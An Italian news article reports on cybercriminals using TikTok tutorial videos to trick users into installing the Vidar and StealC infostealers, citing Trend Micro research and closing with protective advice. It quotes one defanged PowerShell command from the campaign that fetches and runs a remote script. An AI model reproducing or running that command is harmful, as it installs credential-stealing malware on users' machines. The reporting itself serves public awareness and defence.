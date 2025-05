TikTok si trova al centro di una nuova emergenza digitale: la diffusione di software dannosi attraverso video tutorial apparentemente innocui. Questo fenomeno sta attirando l’attenzione degli esperti di sicurezza informatica, preoccupati per il crescente utilizzo della piattaforma da parte dei cybercriminali per diffondere malware come Vidar e StealC. La viralità dei contenuti su TikTok, con video che raggiungono centinaia di migliaia di visualizzazioni in pochi giorni, rende la piattaforma un terreno fertile per queste minacce.

Una ricerca condotta da Trend Micro, azienda leader nel settore della sicurezza informatica, ha evidenziato come gli hacker stiano sfruttando l’algoritmo di TikTok per raggiungere un pubblico vastissimo. Video malevoli, mascherati da guide o tutorial utili, sono progettati per ingannare gli utenti e portarli a eseguire comandi pericolosi. Alcuni di questi contenuti hanno superato il mezzo milione di visualizzazioni, dimostrando l’efficacia della strategia adottata dai criminali informatici.

La strategia d’attacco

Gli hacker utilizzano tecniche avanzate di ingegneria sociale per rendere i loro contenuti credibili. Un esempio emblematico è l’account @gitallowed, che ha condiviso un comando PowerShell apparentemente legittimo:

iex (irm hxxps://allaivo[.]me/spotify)

Inserendo questo comando, gli utenti innescano una sequenza automatizzata che porta all’installazione di malware. Il processo include la creazione di directory nascoste, la modifica delle impostazioni di Windows Defender per evitare rilevamenti e l’installazione di software dannosi come Vidar e StealC. Questi strumenti, noti come infostealer, sono progettati per sottrarre informazioni sensibili, tra cui password, dati personali e credenziali finanziarie.

Rischi e conseguenze

Le conseguenze di queste operazioni malevole possono essere devastanti. I dispositivi infettati da malware non solo mettono a rischio la sicurezza dei dati personali, ma possono anche causare il furto d’identità e la compromissione di sistemi aziendali.

Particolarmente preoccupante è la difficoltà dei tradizionali sistemi di sicurezza nel rilevare minacce provenienti da piattaforme social come TikTok. La capacità degli hacker di sfruttare la viralità dei contenuti rappresenta una sfida significativa per le strategie di difesa attuali.

Contromisure necessarie

La diffusione di malware attraverso TikTok segna una nuova frontiera della cybercriminalità. Per proteggersi da queste minacce, gli esperti raccomandano di adottare un approccio critico verso i contenuti online e di evitare l’esecuzione di comandi suggeriti nei video, anche se sembrano legittimi. È essenziale mantenere aggiornati i software di protezione e implementare soluzioni avanzate di sicurezza informatica.